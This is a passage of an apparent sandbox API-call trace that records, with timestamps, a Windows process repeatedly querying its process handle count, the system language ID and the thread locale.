() returned 0xffffffff [0163.977] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess () returned 0xffffffff [0163.977] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess () returned 0xffffffff [0163.977] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess () returned 0xffffffff [0163.977] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess () returned 0xffffffff [0163.977] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.977] GetSystemDefaultLangID () returned 0x2630409 [0163.977] GetThreadLocale () returned 0x409 [0163.977] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.978] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.978] GetSystemDefaultLangID () returned 0x2630409 [0163.978] GetThreadLocale () returned 0x409 [0163.978] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.979] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.979] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.979] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.979] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.979] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.979] GetCurrentProcess () returned 0xffffffff [0163.979] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.979] GetSystemDefaultLangID () returned 0x2630409 [0163.979] GetThreadLocale () returned 0x409 [0163.980] GetCurrentProcess () returned 0xffffffff [0163.980] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.980] GetSystemDefaultLangID () returned 0x2630409 [0163.980] GetThreadLocale () returned 0x409 [0163.980] GetCurrentProcess () returned 0xffffffff [0163.980] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.980] GetSystemDefaultLangID () returned 0x2630409 [0163.980] GetThreadLocale () returned 0x409 [0163.980] GetCurrentProcess () returned 0xffffffff [0163.980] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.980] GetSystemDefaultLangID () returned 0x2630409 [0163.980] GetThreadLocale () returned 0x409 [0163.980] GetCurrentProcess () returned 0xffffffff [0163.980] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.980] GetSystemDefaultLangID () returned 0x2630409 [0163.980] GetThreadLocale () returned 0x409 [0163.980] GetCurrentProcess () returned 0xffffffff [0163.980] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.980] GetSystemDefaultLangID () returned 0x2630409 [0163.980] GetThreadLocale () returned 0x409 [0163.981] GetCurrentProcess () returned 0xffffffff [0163.981] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.981] GetSystemDefaultLangID () returned 0x2630409 [0163.981] GetThreadLocale () returned 0x409 [0163.981] GetCurrentProcess () returned 0xffffffff [0163.981] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.981] GetSystemDefaultLangID () returned 0x2630409 [0163.981] GetThreadLocale () returned 0x409 [0163.981] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.982] GetThreadLocale () returned 0x409 [0163.982] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.982] GetThreadLocale () returned 0x409 [0163.982] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.982] GetThreadLocale () returned 0x409 [0163.982] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.982] GetThreadLocale () returned 0x409 [0163.982] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.982] GetThreadLocale () returned 0x409 [0163.982] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.982] GetThreadLocale () returned 0x409 [0163.982] GetCurrentProcess () returned 0xffffffff [0163.982] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.982] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.983] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.983] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.983] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.983] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.983] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.983] GetSystemDefaultLangID () returned 0x2630409 [0163.983] GetThreadLocale () returned 0x409 [0163.983] GetCurrentProcess () returned 0xffffffff [0163.983] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.984] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.984] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.984] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.984] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.984] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.984] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.984] GetSystemDefaultLangID () returned 0x2630409 [0163.984] GetThreadLocale () returned 0x409 [0163.984] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.985] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.985] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.985] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.985] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.985] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.985] GetCurrentProcess () returned 0xffffffff [0163.985] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.985] GetSystemDefaultLangID () returned 0x2630409 [0163.985] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.986] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.986] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.986] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.986] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.986] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.986] GetThreadLocale () returned 0x409 [0163.986] GetCurrentProcess () returned 0xffffffff [0163.986] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.986] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.987] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.987] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.987] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.987] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.987] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.987] GetSystemDefaultLangID () returned 0x2630409 [0163.987] GetThreadLocale () returned 0x409 [0163.987] GetCurrentProcess () returned 0xffffffff [0163.987] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.988] GetSystemDefaultLangID () returned 0x2630409 [0163.988] GetThreadLocale () returned 0x409 [0163.988] GetCurrentProcess () returned 0xffffffff [0163.988] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.989] GetCurrentProcess () returned 0xffffffff [0163.989] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.989] GetCurrentProcess () returned 0xffffffff [0163.989] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.989] GetCurrentProcess () returned 0xffffffff [0163.989] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.989] GetCurrentProcess () returned 0xffffffff [0163.989] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.989] GetCurrentProcess () returned 0xffffffff [0163.989] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.989] GetCurrentProcess () returned 0xffffffff [0163.989] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.989] GetSystemDefaultLangID () returned 0x2630409 [0163.989] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.990] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.990] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.990] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.990] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.990] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.990] GetThreadLocale () returned 0x409 [0163.990] GetCurrentProcess () returned 0xffffffff [0163.990] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.990] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.991] GetThreadLocale () returned 0x409 [0163.991] GetCurrentProcess () returned 0xffffffff [0163.991] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.991] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.992] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.992] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.992] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.992] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.992] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.992] GetSystemDefaultLangID () returned 0x2630409 [0163.992] GetThreadLocale () returned 0x409 [0163.992] GetCurrentProcess () returned 0xffffffff [0163.992] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.993] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.993] GetSystemDefaultLangID () returned 0x2630409 [0163.993] GetThreadLocale () returned 0x409 [0163.993] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.994] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.994] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: 